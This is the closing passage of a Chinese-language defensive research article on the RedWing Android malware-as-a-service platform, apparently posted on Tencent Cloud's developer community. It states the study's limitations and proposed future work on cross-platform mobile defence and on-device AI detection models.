本文仅针对 RedWing 安卓 MaaS 平台开展攻防分析,存在两处研究局限:一是未覆盖 iOS 端同类 MaaS 恶意软件技术机理,苹果闭环生态权限管控逻辑与安卓存在显著差异;二是端侧 AI 模型仅完成理论架构与代码逻辑验证,未开展大规模真实终端场景性能、误报率量化测试。后续研究可围绕两大方向延伸:第一,对比 iOS 与 Android MaaS 恶意软件攻击路径差异,构建跨平台统一移动防御模型;第二,基于百万级移动应用行为数据集训练轻量化端侧分类模型,完成真实设备性能、识别精度量化实验,优化模型推理速度与资源占用。

编辑:芦笛(公共互联网反网络钓鱼工作组)

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档